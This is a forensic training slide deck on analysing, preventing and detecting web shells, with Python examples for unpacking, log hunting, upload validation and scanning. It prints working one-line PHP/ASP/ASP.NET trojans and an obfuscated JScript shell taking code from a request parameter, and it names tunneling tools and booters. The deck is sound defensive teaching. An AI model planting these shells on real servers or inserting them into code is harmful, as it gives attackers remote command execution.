Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016

Vincent Lo, LYLC Spear & Shield

■ PART ONE ■

Reminder

Level: Advanced

Prerequisite: basic understanding of a server-side scripting language, such as PHP, ASP, or ASP.NET.

Disclaimer

Opinions are my own and not the views of my employer.

Who is this guy?

Vincent Lo
Senior Incident Responder
CISSP, CCE, GCFA Gold, GCIH, GNFA, GREM
Twitter ● @_VincentLo_
Email ● [email protected]

Agenda | What are we talking about today?

■ PART ONE ● BASIC ■ 1:00 pm – 2:00 pm
■ PART TWO ● ADVANCED ■ 2:30 pm – 3:30 pm

■ PART ONE ● BASIC ■

• Introduction
  ◦ What are they?
  ◦ Well-known web shells
• Web Shell Analysis Techniques
  ◦ Dynamic behavior analysis
  ◦ Static source code analysis

■ PART TWO ● ADVANCED ■

• Advanced source code analysis
• Advanced features
  ◦ Hidden shells
  ◦ Tunneling
  ◦ Mass mailer
  ◦ DDoS
  ◦ System-targeted shells
• Web Shell Prevention
• Web Shell Detection
• Incident Response

Web Shells | What are they?

• Dynamic web pages
• Written in server-side script languages, such as PHP, JSP, ASP, and ASP.NET
• Discovered many years ago
• Still evolving….

Web Shells | What can they do?

File Manager
• Copy
• Edit
• Delete
• Move
• Execute
• Upload

Server Information
• Operating system information
• Loaded Apache modules
• Disabled PHP functions
• Useful commands
• Downloader commands
• /etc/passwd
• CPU info
• Memory info
• Partition info
• PHP environment

System Thread Information
• List
• Kill

Console
• Run your own commands
• List dir
• Find
• Locate

PHP
• Execute your own code

String Tools
• String conversion
• Encode/decode
• MD5 cracking websites

Bruteforce
• FTP
• MySQL
• PostgreSQL

SQL
• MySQL
• PostgreSQL

Network
• Bind a port to /bin/sh (bind shell)
• Back-connect (reverse shell to the attacker's host)

Self Remove

AND MORE… (will be introduced in PART TWO.)

Web Shells | Well-known web shells

• WSO (FilesMan)
• b374k
• c99
• China Chopper (client program)
• Weevely
• And more…

Web Shells | Why do we care?

Well, what if they are found on your web servers?

Web Shells | Real Incident

Source: http://krebsonsecurity.com/2016/02/breached-credit-union-comes-out-of-its-shell/

Web Shells | How did they get into our web servers?

• Cross-Site Scripting;
• SQL Injection;
• Vulnerabilities in applications/services (e.g., WordPress or other CMS applications);
• File processing vulnerabilities (e.g., upload filtering or assigned permissions);
• Remote File Include (RFI) and Local File Include (LFI) vulnerabilities;
• Exposed admin interfaces (possible areas to find the vulnerabilities mentioned above).

Source: https://www.us-cert.gov/ncas/alerts/TA15-314A

Web Shell Analysis | Why do we need to analyze them?

“If you know the enemy and yourself, you need not fear battles.
If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every battle.”
- The Art of War by Sun Tzu

Web Shell Analysis | How to analyze them?

• Dynamic behavior analysis
• Static source code analysis
  ◦ What to look for?
  ◦ What to do if it is packed?
  ◦ What if….?
• Advanced source code analysis

Dynamic behavior analysis | Environment

• Analysis environment
  ◦ Sandbox
  ◦ Private network (isolated; the shell's back-connect and downloader features must not be able to reach the Internet)
• Operating system
  ◦ Linux
  ◦ Windows
• Web server
  ◦ Apache
  ◦ IIS
  ◦ Java web server
• Web server configuration
  ◦ Permissions

Dynamic behavior analysis | Environment

• Consulting work
  ◦ Pre-build the environment/template to reduce response time.
  ◦ Mimic the client's web server environment as closely as possible (same language version, modules, and disabled functions), since a shell may behave differently elsewhere.
• Ideal environment

Dynamic behavior analysis | Demonstration

• WSO 2.0

Dynamic behavior analysis | Pros and cons

• Pros
  ◦ Easy to understand how web shells work.
  ◦ Identify their features and artefacts in a short time.
  ◦ Can test functions and see whether they really work.
• Cons
  ◦ May miss hidden functions.
  ◦ May not work if the web shell requires a password.
  ◦ May need time to build/configure the environment.

Static source code analysis

• First time?
• Need to understand the server-side script languages.
  ◦ Google can be your best friend.
• Review code and get familiar with attack techniques.
• Don't get discouraged and don't give up easily.
  ◦ Some web shells are designed to be hard to read.
  ◦ Some web shells even contain fake functions/code.
• Don't worry. Review speed improves once you are familiar with the code.

Static source code analysis | PHP | What to look for?

• Exercise (WSO 2.0)
• Try to identify interesting functions.

• Exercise (WSO 2.0)
• Password
  ◦ The password is provided if you are lucky. ☺
  ◦ MD5 algorithm? MD5 algorithm! WSO stores an MD5 hash and compares it with md5() of the submitted password, so the cleartext never appears in the source; it has to be cracked or bypassed.

• Exercise (WSO 2.0)
• Avoid search engines
  ◦ HTTP 404 – Not Found (unauthenticated visitors, including crawlers, get a 404 status so the shell is not indexed)
  ◦ Exit
• Commands behind the scene

• Exercise (WSO 2.0)
• KOI8-R & KOI8-U (Cyrillic character encodings)

Static source code analysis | PHP | What to look for?

• Variable names
• Passwords
• Interesting functions
• Comments, if you are lucky. ☺

Static source code analysis | PHP | Password protected

• Find the password
  ◦ Check the source code
  ◦ Google
  ◦ Crack it
• Bypass/kill the password

Static source code analysis | PHP | Obfuscation techniques

• Login password
  ◦ Validation algorithm
  ◦ MD5/SHA1
  ◦ Customised algorithm
• HTTP 404 code
• HTTP 404 page
• Variable names

Static source code analysis | PHP | What if it is packed?

• Decoding environment
  ◦ Web server
  ◦ Web components
  ◦ Browser
• Decoding tools
  ◦ Online
  ◦ Manual
  ◦ May need to develop decoding tools to assist
• Encoding algorithm
  ◦ Base64
  ◦ ROT13
  ◦ Character encoding
  ◦ Customised encoding algorithms
  ◦ Multiple encoding with different algorithms

• Exercise (WSO 2.1)
  ◦ How to unpack the shell?
  ◦ eval => echo: replace the eval() that would execute the decoded layer with echo, so the decoded source is printed instead of run; repeat for each layer.

• Exercise (b374k)
  ◦ How to unpack the shell?
  ◦ String operators
  ◦ eval => echo
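The eval => echo step done offline, as an added example (my code, not from the slides and not from WSO or b374k): the PHP decoder functions usually wrapped around eval() are reproduced in Python and applied from the inside out, one layer at a time, until the expression inside eval() is no longer a static literal. The packed sample is constructed inside the script; the wrapper chain and the one-line trojan it hides are assumptions chosen to look like a typical packer, not real shell source.

```python
"""Peel eval(decode(...)) wrappers from a packed PHP web shell, offline.

Added example, not from the slides. It does what "eval => echo" does in a
sandbox, without running PHP: the decoders PHP would call are reproduced
here and applied from the inside out, layer by layer.
"""
import base64
import codecs
import re
import zlib

# PHP functions commonly wrapped around eval(), with their Python equivalents.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),       # raw DEFLATE
    "gzuncompress": lambda b: zlib.decompress(b),         # zlib container
    "gzdecode": lambda b: zlib.decompress(b, 16 + 15),    # gzip container
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

_EVAL = re.compile(r"\beval\s*\(")
_CALL = re.compile(r"\s*([A-Za-z_][A-Za-z0-9_]*)\s*\(")
_STR = re.compile(r"""\s*(['"])([^'"]*)\1""")
_CLOSE = re.compile(r"\s*\)")


def parse_expr(src, pos):
    """Parse f(g('literal')) at pos -> (functions outermost-first, literal bytes, end).

    Anything else (a variable such as $_POST, concatenation, ...) raises
    ValueError: that is the signal that static decoding has gone as far as it can.
    """
    m = _CALL.match(src, pos)
    if m:
        funcs, literal, end = parse_expr(src, m.end())
        close = _CLOSE.match(src, end)
        if not close:
            raise ValueError("missing ')' near offset %d" % end)
        return [m.group(1)] + funcs, literal, close.end()
    m = _STR.match(src, pos)
    if m:
        return [], m.group(2).encode("latin-1"), m.end()
    raise ValueError("not a static expression at offset %d" % pos)


def peel_once(src):
    """Decode one eval(...) layer -> (inner code, decoder chain), or None if there is none."""
    m = _EVAL.search(src)
    if not m:
        return None
    try:
        funcs, data, _ = parse_expr(src, m.start())
    except ValueError:
        return None                      # e.g. eval($_POST['cmd']): runtime input, not a literal
    chain = funcs[1:]                    # drop the leading "eval"
    for name in reversed(chain):         # the innermost PHP call runs first
        if name not in DECODERS:
            raise ValueError("no Python equivalent for %s(); add one to DECODERS" % name)
        data = DECODERS[name](data)
    return data.decode("latin-1"), chain


def unpack(src):
    """Peel every layer -> (final source, list of decoder chains, outermost first)."""
    chains = []
    while True:
        step = peel_once(src)
        if step is None:
            return src, chains
        src, chain = step
        chains.append(chain)


# ---- constructed sample (assumption: a typical two-layer packer) ----
def _raw_deflate(b):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(b) + c.flush()

_ENCODERS = {                 # inverses of DECODERS, only needed to build the sample
    "base64_decode": base64.b64encode,
    "gzinflate": _raw_deflate,
    "gzuncompress": zlib.compress,
    "str_rot13": DECODERS["str_rot13"],
    "strrev": lambda b: b[::-1],
}

def php_pack(code, chain, tags=False):
    """Wrap code as eval(chain[0](chain[1](...('literal')...))); chain is outermost-first."""
    data = code.encode("latin-1")
    for name in chain:                   # apply inverses outermost-first, i.e. the reverse of PHP's decode order
        data = _ENCODERS[name](data)
    expr = "eval(%s('%s')%s);" % ("(".join(chain), data.decode("latin-1"), ")" * len(chain))
    return "<?php %s ?>" % expr if tags else expr

INNER = "$p = 'cmd'; if (isset($_POST[$p])) { eval($_POST[$p]); }"   # a one-sentence trojan

def build_sample():
    layer1 = php_pack(INNER, ["str_rot13", "base64_decode"])
    return php_pack(layer1, ["gzinflate", "base64_decode"], tags=True)


if __name__ == "__main__":
    code, chains = unpack(build_sample())
    for i, c in enumerate(chains, 1):
        print("layer %d: eval(%s(...))" % (i, "(".join(c)))
    print("final code:", code)
```

Decoding stops at the first eval() whose argument is not a literal: that is the point where the decoded code reads input from the request, and the next step is traffic analysis rather than more decoding. Customised encoders, string operators, and concatenated fragments are not handled; when a shell uses them, add the decoder to DECODERS or fall back to the echo trick in the sandbox.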

Intermittent | Web Shells

<script runat="server" language="JScript">
// exs(): builds the string "unsafe" from pieces and calls eval(str, "unsafe"),
// JScript.NET's unrestricted eval mode. The /*///*/ comment is noise that
// breaks a naive grep for "eval(".
function exs(str) {
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;
    var b= /*///*/eval(str,a);
    return(b);
}
// dec(): walks the hex string two digits at a time and subtracts a key digit
// (position ((k+2)/2) mod key.length) from each character code; a pair that
// starts with a letter is read as four hex digits instead.
function dec(str,key) {
    var k,q,t;
    var s="";
    var p="";
    for(k = 0; k < str.length; k=k+2)
    {
        t = ((k+2)/2) % key.length;
        p = key.substr(t, 1);
        if (isFinite(str.substr(k, 1)))
        {
            q = "0x"+ str.substr(k, 2);
            s = s + char(int(q)-p);// + "|" + p +"|";
        }
        else
        {
            q = "0x"+ str.substr(k, 4);
            s = s + char(int(q)-p);
            k = k+2;
        }
    }
    return(s);
}
</script>
<%
// dec(...) yields Request.Item["z"]; the inner exs() evaluates that to fetch
// request parameter z, and the outer exs() runs the parameter's contents as code.
exs(exs(dec("556675766874782F4C75696E5E237E2360","1314")));
%>
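To see what the JScript sample above actually executes, as an added example (my port, not code from the slides): dec() is reimplemented in Python and applied to the constant and key that appear in the sample. It yields Request.Item["z"], so the inner exs() fetches request parameter z and the outer exs() evaluates whatever the client sent in it: the same one-sentence-trojan pattern as <%eval(Request.Item["cmd"],"unsafe")%> on the next slides, with the parameter renamed and the string hidden behind a decoder. The enc() helper and the parameter-name extractor are additions of mine.

```python
"""Port of the dec() decoder from the JScript sample above (added example).

dec() walks the hex string two digits at a time, takes the key digit at
position ((k+2)/2) mod len(key), and subtracts it from each character code.
When a hex pair would start with a letter (A-F) the original reads four
hex digits instead; that branch is reproduced for fidelity even though the
sample never exercises it.
"""
import re

ENCODED = "556675766874782F4C75696E5E237E2360"   # constant from the sample
KEY = "1314"                                       # key from the sample


def dec(s, key):
    """Faithful port of dec(str, key) from the JScript above."""
    out = []
    k = 0
    while k < len(s):
        p = int(key[((k + 2) // 2) % len(key)])   # key digit for this position
        width = 2 if s[k].isdigit() else 4         # the isFinite() check in the original
        out.append(chr(int(s[k:k + width], 16) - p))
        k += width
    return "".join(out)


def enc(plain, key):
    """Inverse of dec() for ASCII input: useful to confirm a suspected key against another sample."""
    out = []
    for i, ch in enumerate(plain):
        p = int(key[(i + 1) % len(key)])          # same key index dec() uses for pair i
        out.append("%02X" % (ord(ch) + p))
    return "".join(out)


def request_parameter(decoded):
    """Pull the parameter name out of Request.Item["..."] (assumed shape of the decoded string)."""
    m = re.search(r'Request\.Item\["([^"]+)"\]', decoded)
    return m.group(1) if m else None


if __name__ == "__main__":
    stage1 = dec(ENCODED, KEY)
    print("dec() yields:", stage1)
    print("parameter name:", request_parameter(stage1))
```

Knowing the parameter name is what makes the rest of the investigation possible: it is the field to look for in POST bodies in the PCAP and the string to search for in any request logging that captured form data.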

■ PART TWO ■

Advanced Source Code Analysis | What if…?

Advanced Source Code Analysis | Demonstration

• ASP | Self-changing code

Advanced Source Code Analysis | What if…?

• What if we do not have much to review?

What if…? | One Sentence Trojan

• One Sentence Trojan (一句話木馬, "one-sentence trojan")
• PHP: <?php eval($_POST[cmd]);?>
• ASP: <%execute(request("cmd"))%>
• ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe")%>

Source: http://baike.baidu.com/view/102246.htm

What if…? | One Sentence Trojan

Client/server architecture: the server side is the one-line script; the file manager, command execution, and database features live in a client program that sends the code to run in each request.

Client programs
• China Chopper (中国菜刀, "Chinese kitchen knife")
• Lanker (lanker一句话客户端, "Lanker one-sentence client")
• ZV (ZV新型PHP一句话木马客户端GUI版, "ZV new-style PHP one-sentence trojan client, GUI edition")
• 一句话客户端增强版 ("one-sentence client, enhanced edition")

Source: http://baike.baidu.com/view/102246.htm

What if…? | One Sentence Trojan

In the real world, a one-sentence trojan's code is not always the same. It can be modified or encoded to avoid detection.

• <%eval request("value")%>
• <%execute request("value")%>
• <%execute(request("value"))%>
• <%If Request("value")<>"" Then Execute(Request("value"))%>
• <%if request("value")<>"" then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>

Source: http://baike.baidu.com/view/102246.htm

How do we analyze it?

There is almost nothing in the file itself; the attacker's code arrives in the request body, so the evidence is in the traffic to the file rather than in its source:
• Web server logs
• IDS/IPS alerts
• Proxy logs
• PCAP
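What the web-server-log side of that analysis can look like, as an added example (my code, not from the slides or from any tool): a pass over Apache combined-format access log lines looking for the pattern a one-sentence trojan produces from the server's point of view: a script that is only ever POSTed to, by one or two client addresses, with no Referer, often sitting in a directory meant for static files. The log lines are constructed for the example and the thresholds are assumptions to tune per site.

```python
"""Hunt for one-sentence-trojan traffic in Apache combined-format access logs.

Added example, not from the slides. The server-side file gives you nothing
to read, so the hunt moves to the log: a script that is only ever POSTed to,
by one or two client addresses, with no Referer, is how a client such as
China Chopper looks from the web server's side. Log lines and thresholds
are constructed/assumed for the example.
"""
import re
from collections import defaultdict

SCRIPT_EXT = (".php", ".php5", ".phtml", ".asp", ".aspx", ".ashx", ".jsp", ".jspx")
STATIC_DIRS = ("/images/", "/uploads/", "/cache/", "/tmp/", "/files/")   # where no script should live

# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Constructed sample: one shell under /images/, plus ordinary site traffic.
LOG_LINES = """\
203.0.113.7 - - [25/May/2016:13:02:11 +1000] "POST /images/cache.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [25/May/2016:13:02:19 +1000] "POST /images/cache.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [25/May/2016:13:03:02 +1000] "POST /images/cache.php HTTP/1.1" 200 318 "-" "Mozilla/5.0"
198.51.100.4 - - [25/May/2016:13:05:41 +1000] "GET /index.php HTTP/1.1" 200 8841 "-" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.4 - - [25/May/2016:13:05:43 +1000] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.com/contact.php" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.9 - - [25/May/2016:13:06:10 +1000] "GET /contact.php HTTP/1.1" 200 5210 "http://www.example.com/" "Mozilla/5.0 (Macintosh)"
198.51.100.9 - - [25/May/2016:13:06:30 +1000] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.com/contact.php" "Mozilla/5.0 (Macintosh)"
192.0.2.15 - - [25/May/2016:13:07:00 +1000] "GET /images/logo.png HTTP/1.1" 200 4410 "http://www.example.com/" "Mozilla/5.0 (X11)"
203.0.113.7 - - [25/May/2016:13:09:27 +1000] "POST /images/cache.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""


def parse(line):
    """One combined-format line -> dict of fields, or None if it does not parse."""
    m = LINE.match(line)
    return m.groupdict() if m else None


def profile(lines):
    """Per-path counters: who talks to it, how (GET/POST), and whether a Referer is ever sent."""
    stats = defaultdict(lambda: {"get": 0, "post": 0, "post_noref": 0, "ok": 0, "ips": set()})
    for line in lines:
        r = parse(line)
        if not r:
            continue
        path = r["uri"].split("?", 1)[0]
        s = stats[path]
        s["ips"].add(r["ip"])
        if r["method"] == "POST":
            s["post"] += 1
            if r["referer"] in ("", "-"):
                s["post_noref"] += 1
        elif r["method"] == "GET":
            s["get"] += 1
        if r["status"] == "200":
            s["ok"] += 1
    return stats


def suspicious(lines, max_ips=2):
    """Return [(path, reasons)] for scripts whose traffic looks like a web shell client's."""
    hits = []
    for path, s in profile(lines).items():
        if not path.lower().endswith(SCRIPT_EXT) or s["post"] == 0:
            continue
        reasons = []
        if s["get"] == 0:
            reasons.append("POST only, never fetched with GET")
        if s["post_noref"] == s["post"]:
            reasons.append("no Referer on any POST (not submitted from a page)")
        if len(s["ips"]) <= max_ips:
            reasons.append("only %d client address(es)" % len(s["ips"]))
        if any(path.startswith(d) for d in STATIC_DIRS):
            reasons.append("script under a static-content directory")
        if len(reasons) >= 3:          # assumed threshold; tune per site
            hits.append((path, reasons))
    return sorted(hits)


if __name__ == "__main__":
    for path, reasons in suspicious(LOG_LINES.splitlines()):
        print(path)
        for why in reasons:
            print("   -", why)
```

The contact form is not flagged even though it receives POSTs: it is also fetched with GET, and every POST carries the Referer of the page that submitted it. The POST body itself is not in the access log, which is why the PCAP or a proxy with body logging is needed to recover the commands once the file is identified.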

Advanced Features | Hidden Shells

Hidden | JPEG

• JPEG EXIF: hide the malicious code in an EXIF field (or append it to the image file) and have a small loader script read the field and eval() it; the image still displays normally and passes an image-type check.
• Steganography: http://www.slideshare.net/saumilshah/stegosploit-hacking-with-pictures

Source: http://www.arkteam.net/?p=48

Advanced Features | Tunneling

Tunneling | SOCKS proxy | reGeorg

“The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.”

• Client is written in Python
• Supports multiple server-side languages
  ◦ PHP
  ◦ ASPX
  ◦ ASHX
  ◦ JSP

Source: https://github.com/sensepost/reGeorg

Tunneling | Tunna

“Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.”

• Client is written in Python
• Supports multiple server-side languages
  ◦ PHP
  ◦ ASPX
  ◦ JSP

Source: https://github.com/SECFORCE/Tunna

Advanced Features | Mass Mailer

Advanced Features | Distributed Denial of Service

DDoS | Why web servers?

• 24 x 7
• Accessibility
• Usually more powerful than PCs
• Bandwidth

DDoS | Shell Booter

• Execute Booter
• Panic Stresser
• Vengeance Booter
• Anonymous Booter
• And more…

Advanced Features | System-targeted shells

System-targeted web shells | WHMCS Killer

• Targets WHMCS, the hosting billing and automation platform.

System-targeted web shells | cPanel Cracker

• Targets cPanel hosting control panel accounts.

Web Shell Prevention | “Prevention is more important than detection and recovery.”

Web Shell Prevention | Attacks, Vulnerabilities, & Patches

• Web application firewall
• Penetration testing
  ◦ Fix the code the test finds
• Updates & patches
  ◦ Operating system
  ◦ Web servers
  ◦ Web server components
  ◦ CMS & its plugins

Web Shell Prevention | Securing CMS

Source: https://www.us-cert.gov/ncas/alerts/TA15-314A
Source: http://asd.gov.au/publications/protect/securing-cms.htm
Hardening WordPress: http://codex.wordpress.org/Hardening_WordPress
Joomla – Security Checklist: https://docs.joomla.org/Security_Checklist

Web Shell Prevention | Upload Function

• Check uploaded files
  ◦ Whitelist file extensions
  ◦ Check the file extension properly: reject double and trick extensions such as .php.jpg, .jpg.asp, .php;.jpg and so on.
  ◦ Don't rely on the client-supplied file type (Content-Type); check the file content.
  ◦ Be careful about .cer if using IIS (older IIS versions map .cer to the ASP script handler).
• Randomize uploaded filenames
• Disable "execute" permission on the upload directory
• Don't call it "upload" (upload.aspx, upload.php and so on are the first things an attacker looks for)
• Don't show the actual path
  ◦ Error messages
  ◦ URLs
• Re-encode/re-generate images
• Disable components/functions that are not required.
  ◦ base64_decode, gzinflate and the like can go in PHP's disable_functions; eval is a language construct and cannot be disabled that way, so the other controls still matter.
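The upload checks from the slide as code, as an added example (mine, not from the slides, and independent of any framework): the client-supplied name is validated against every extension it carries, not just the last one, the stored name is random, and the first bytes of the file are checked against the signature for the accepted type instead of trusting Content-Type. The extension lists and the signatures are assumptions to adjust per site; re-encoding the image, which the slide also recommends, is the stronger content check and is not shown here.

```python
"""Upload-function checks from the slide (added example, not from the slides).

Call accept_upload() with the client-supplied filename and the file's bytes;
store the file under the random name it returns, in a directory without
execute permission. Extension lists and signatures are assumptions.
"""
import os
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf"}          # whitelist, per site
# Anything a web server might hand to a script engine, whatever else the name says.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc",
              "asp", "aspx", "asa", "asax", "ashx", "asmx", "cer", "cdx",
              "jsp", "jspx", "jsw", "jsv", "cgi", "pl", "py", "sh", "htaccess"}

MAGIC = {                      # signature bytes for the types we accept
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
    "pdf":  (b"%PDF-",),
}


def safe_upload_name(client_name):
    """Validate the client-supplied name -> (ok, random_server_name_or_reason)."""
    name = os.path.basename(client_name.replace("\\", "/"))    # drop any path component
    if not name or "\x00" in name or ";" in name or ":" in name:
        return False, "bad characters in filename"           # .php;.jpg and NUL-byte tricks
    parts = name.lower().split(".")
    exts = [p for p in parts[1:] if p]                        # every extension, not only the last
    if not exts:
        return False, "no extension"
    if any(e in SCRIPT_EXT for e in exts):
        return False, "script extension present: ." + ".".join(exts)   # .php.jpg, .jpg.asp
    if exts[-1] not in ALLOWED_EXT:
        return False, "extension not allowed: ." + exts[-1]
    # Random name: the attacker neither learns nor controls where the file lands.
    return True, secrets.token_hex(16) + "." + exts[-1]


def looks_like_image(head, ext):
    """Check the file's first bytes against the signature for its (already validated) extension."""
    return any(head.startswith(sig) for sig in MAGIC.get(ext, ()))


def accept_upload(client_name, data):
    """Combined check -> (ok, server_name_or_reason). Reasons never include a server path."""
    ok, result = safe_upload_name(client_name)
    if not ok:
        return False, result
    ext = result.rsplit(".", 1)[1]
    if not looks_like_image(data[:16], ext):
        return False, "content does not match extension"
    return True, result


if __name__ == "__main__":
    for name in ("photo.jpg", "shell.php.jpg", "shell.jpg.asp", "shell.php;.jpg", "cert.cer"):
        print(name, "->", safe_upload_name(name))
    print(accept_upload("photo.jpg", b"<?php eval($_POST['c']); ?>"))
```

The signature check is deliberately weak on its own: a valid JPEG header followed by PHP code passes it, which is exactly the EXIF/appended-code trick from the hidden-shells section. It is the combination that holds: no script extension anywhere in the name, a random stored name, no execute permission on the directory, and regenerating the image so appended data does not survive.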

Web Shell Detection | Are they on our servers?

Web Shell Detection | How do we detect them?

• PHP Shell Detector
• NeoPI
• Web vulnerability scanners
• Antivirus programs
• IDS/IPS
• File integrity monitoring (baseline the web root and alert on new or changed script files)
• Customised scripts

Incident Response | Find evil

Find evil | Evidence

• Web server logs
  ◦ Check the integrity of the logs (an attacker with a shell on the box can edit or truncate them)
  ◦ Fields (confirm that method, URI, query string, status, Referer, and User-Agent are logged; the POST body normally is not)
• Proxy logs
• IDS/IPS logs
• Firewall logs
• Web site files
• Relevant servers' logs & artifacts

Find evil | How do we find them?

• Yara
• Grep
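Grep with scoring, as an added example (my code, not from the slides and not a reimplementation of any named tool): the indicators from the static-analysis section (eval and friends, decoder wrappers, request input reaching them, a hashed login password, the fake-404 trick, long encoded blobs, function calls through a variable) turned into a scan over a web root. Every file is read, whatever its extension, so a shell hidden in a .jpg is scored too. The sample files are constructed and written to a temporary directory; the weights and threshold are assumptions to calibrate against a known-clean copy of the site.

```python
"""Score files under a web root for web-shell indicators (added example, not from the slides).

The indicators are the ones worth grepping for during static review; each
YARA rule you would write for them is one entry in INDICATORS. Sample files
are constructed below so the script runs offline.
"""
import os
import re
import tempfile

INDICATORS = [   # (name, regex, weight); weights are assumptions
    ("exec", re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)\s*\(", re.I), 3),
    ("backtick", re.compile(r"`[^`]*\$[^`]*`"), 3),                       # `$cmd` shell execution
    ("decoder", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|strrev)\s*\(", re.I), 2),
    ("input_to_exec", re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|preg_replace)\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)", re.I), 5),
    ("preg_e", re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I), 4),   # /e modifier
    ("hash_login", re.compile(r"\b(md5|sha1)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I), 3),
    ("fake_404", re.compile(r"header\s*\(\s*['\"]HTTP/1\.[01]\s+404", re.I), 3),
    ("blob", re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"), 2),            # long encoded literal
    ("dynamic_call", re.compile(r"\$\w+\s*\(\s*\$\w+"), 2),                # $f($x): callee from a variable
]

THRESHOLD = 5   # assumed; tune against a clean copy of the site


def score_source(text):
    """Return (score, [names of indicators that matched])."""
    score, hits = 0, []
    for name, rx, weight in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(name)
    return score, hits


def scan_tree(root, max_bytes=2_000_000):
    """Walk root; return [(path relative to root, score, hits)] at or over THRESHOLD, worst first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            if os.path.getsize(full) > max_bytes:
                continue
            with open(full, "rb") as fh:
                score, hits = score_source(fh.read().decode("latin-1"))
            if score >= THRESHOLD:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, score, hits))
    return sorted(findings, key=lambda f: -f[1])


# Constructed sample web root: a clean page, a packed WSO-style shell, and a one-liner inside a JPEG.
SAMPLES = {
    "index.php": b"<?php require 'config.php'; echo htmlspecialchars($_GET['q']); ?>",
    "images/cache.php": (b"<?php if(md5($_POST['pass'])!=='5f4dcc3b5aa765d61d8327deb882cf99')"
                         b"{header('HTTP/1.0 404 Not Found');exit;} "
                         b"eval(gzinflate(base64_decode('" + b"QUFB" * 60 + b"'))); ?>"),
    "uploads/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF<?php @eval($_POST['z']); ?>",
}


def build_sample_tree():
    """Write SAMPLES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot_")
    for rel, data in SAMPLES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for rel, score, hits in scan_tree(build_sample_tree()):
        print("%3d  %-22s %s" % (score, rel, ", ".join(hits)))
```

Expect noise from legitimate code that decodes base64 or calls functions through variables; that is what the threshold and the clean baseline are for. Files modified after the last known-good deployment, and any file under an upload or image directory that scores at all, deserve a manual read regardless of the number.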

Find evil | How do we find them?

Incident Response

92

Find evil | Experience

Incident Response

Page 47: Advanced Web Shell Forensic Analysis - index-of.co.ukindex-of.co.uk/Webshell/advanced-web-shell... · - The Art of War by Sun Tzu Why do we need to analyze them? Web Shell Analysis

Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016

Vincent Lo, LYLC Spear & Shield 47

93

Find evil | Experience

Incident Response

9494

Master Title

RecapWhat do we learn today?

Page 48: Advanced Web Shell Forensic Analysis - index-of.co.ukindex-of.co.uk/Webshell/advanced-web-shell... · - The Art of War by Sun Tzu Why do we need to analyze them? Web Shell Analysis

Advanced Web Shell Forensic Analysis Pt. 1 & 2 5-25-2016

Vincent Lo, LYLC Spear & Shield 48

95

• Well-known web shells

• Dynamic analysis

• Static analysis

• Web shell prevention and detection

• Incident response

• The analysis concept we learn today works for analyzing malicious PowerShell scripts too.

What do we learn today?

Recap

96

Vincent Lo | Senior Incident ResponderTWITTER ■@_VincentLo_

EMAIL ■ [email protected]

LYLC-SPEARANDSHIELD.TUMBLR.COM

THANK YOUTHANK YOU